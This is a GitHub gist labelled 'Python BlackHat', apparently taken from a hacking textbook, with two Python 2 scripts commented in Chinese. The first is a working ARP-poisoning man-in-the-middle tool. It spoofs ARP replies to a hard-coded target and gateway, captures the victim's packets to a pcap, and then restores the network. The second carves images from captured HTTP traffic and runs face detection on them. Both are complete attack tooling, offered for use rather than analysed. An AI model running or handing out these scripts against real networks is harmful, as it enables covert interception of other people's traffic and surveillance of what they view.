Created
September 22, 2017 19:36
-
-
Save ttcmk/c8c3cb3a40611cb0f0fd77f57b2a62d6 to your computer and use it in GitHub Desktop.
Python BlackHat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from scapy.all import * | |
import os | |
import sys | |
import threading | |
import signal | |
# 运行前,Mac:sudo sysctl -w net.inet.ip.forwarding=1 | |
# Linux: echo 1 > /proc/sys/net/ipv4/ip_forward | |
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac): | |
# 以下代码中调用send函数的方式稍有不同 | |
print "[*] Restoring target... " | |
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5) | |
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5) | |
# 发送退出信号到主线程 | |
os.kill(os.getpid(), signal.SIGINT) | |
def get_mac(ip_address): | |
# 形如:(<Results: TCP:0 UDP:0 ICMP:1 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>) | |
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10) | |
# 返回从响应数据中获取的MAC地址 | |
for s, r in responses: | |
return r[Ether].src | |
return None | |
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac): | |
# 构建欺骗目标的ARP请求(),这里没设置hwsrc,默认就是本机咯 | |
poison_target = ARP() | |
poison_target.op = 2 | |
poison_target.psrc = gateway_ip | |
poison_target.pdst = target_ip | |
poison_target.hwdst = target_mac | |
poison_gateway = ARP() | |
poison_gateway.op = 2 | |
poison_gateway.psrc = target_ip | |
poison_gateway.pdst = gateway_ip | |
poison_gateway.hwdst = gateway_mac | |
print "[*] Beginning the ARP Poison. [CTRL-C to stop]" | |
while True: | |
try: | |
send(poison_target) | |
send(poison_gateway) | |
time.sleep(2) | |
except KeyboardInterrupt: | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
print "[*] ARP Poison attack finished" | |
return | |
interface = "eth0" | |
target_ip = "192.168.1.7" | |
gateway_ip = "192.168.1.1" | |
packet_count = 1000 | |
# 设置嗅探的网卡 | |
conf.iface = interface | |
# 关闭输出 | |
conf.verb = 0 | |
print "[*] Setting up %s" % interface | |
gateway_mac = get_mac(gateway_ip) | |
if gateway_mac is None: | |
print "[!!!] Failed to get gateway MAC. Exiting" | |
sys.exit(0) | |
else: | |
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac) | |
target_mac = get_mac(target_ip) | |
if target_mac is None: | |
print "[!!!] Failed to get target MAC. Exiting" | |
sys.exit(0) | |
else: | |
print "[*] Target %s is at %s" % (target_ip, target_mac) | |
# 启动ARP投毒线程 | |
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac)) | |
poison_thread.start() | |
try: | |
print "[*] Starting sniffer for %d packets" % packet_count | |
bpf_sniffer = "ip host %s" % target_ip | |
packets = sniff(count=packet_count, filter=bpf_sniffer, iface=interface) | |
# 将捕获的数据包输出到文件 | |
wrpcap('arper.pcap', packets) | |
# 还原网络配置 | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
except KeyboardInterrupt: | |
# 还原网络配置 | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
sys.exit(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import re | |
import zlib | |
import cv2 | |
from scapy.all import * | |
picture_directory = "./pictures" | |
faces_directory = "./faces" | |
pcap_file = "bhp.pcap" | |
def get_http_headers(http_payload): | |
try: | |
# 如果为HTTP流量,提取HTTP头 | |
headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2] | |
# 对HTTP头进行切分 | |
# (?P<name>.*?) ---> 对找到的结果进行进一步分割成字典形式 | |
# 如:dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", "Content-Type: image/pgf\r\n")) | |
# 输出:{'Content-Type': 'image/pgf'} | |
headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw)) | |
except: | |
return None | |
if "Content-Type" not in headers: | |
return None | |
return headers | |
def extract_image(headers, http_payload): | |
image = None | |
image_type = None | |
try: | |
if "image" in headers['Content-Type']: | |
# 获取图像的类型和图像数据 | |
image_type = headers['Content-Type'].split("/")[1] | |
image = http_payload[http_payload.index("\r\n\r\n") + 4:] | |
# 如果进行了数据压缩则解压 | |
try: | |
if "Content-Encoding" in headers.keys(): | |
if headers['Content-Encoding'] == 'gzip': | |
image = zlib.decompress(image, 16 + zlib.MAX_WBITS) | |
elif headers['Content-Encoding'] == 'deflate': | |
image = zlib.decompress(image) | |
except: | |
pass | |
except: | |
return None, None | |
return image, image_type | |
def face_detect(path, file_name): | |
img = cv2.imread(path) | |
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml") | |
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20)) | |
if len(rects) == 0: | |
return False | |
rects[:, 2:] += rects[:, :2] | |
# 对图像中的人脸进行高亮显示处理 | |
for x1,y1,x2,y2 in rects: | |
cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2) | |
cv2.imwrite("%s/%s-%s" % (faces_directory, pcap_file, file_name), img) | |
return True | |
def http_assembler(pcap_file): | |
carved_images = 0 | |
faces_detected = 0 | |
a = rdpcap(pcap_file) | |
sessions = a.sessions() | |
for session in sessions: | |
http_payload = "" | |
for packet in sessions[session]: | |
# 这一步与在Wireshark中右键 Follow TCP Stream 相似 | |
try: | |
if packet[TCP].dport == 80 or packet[TCP].sport == 80: | |
# 对数据组包 | |
http_payload += str(packet[TCP].payload) | |
except: | |
pass | |
headers = get_http_headers(http_payload) | |
if headers is None: | |
continue | |
image, image_type = extract_image(headers, http_payload) | |
if image is not None and image_type is not None: | |
# 存储图像 | |
file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type) | |
fd = open("%s/%s" % (picture_directory, file_name), "wb") | |
fd.write(image) | |
fd.close() | |
carved_images += 1 | |
# 开始人脸检测 | |
try: | |
result = face_detect("%s/%s" % (picture_directory, file_name), file_name) | |
if result is True: | |
faces_detected += 1 | |
except: | |
pass | |
return carved_images, faces_detected | |
if __name__ == '__main__': | |
carved_images, faces_detected = http_assembler(pcap_file) | |
print "Extracted: %d images" % carved_images | |
print "Detected: %d faces" % faces_detected |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment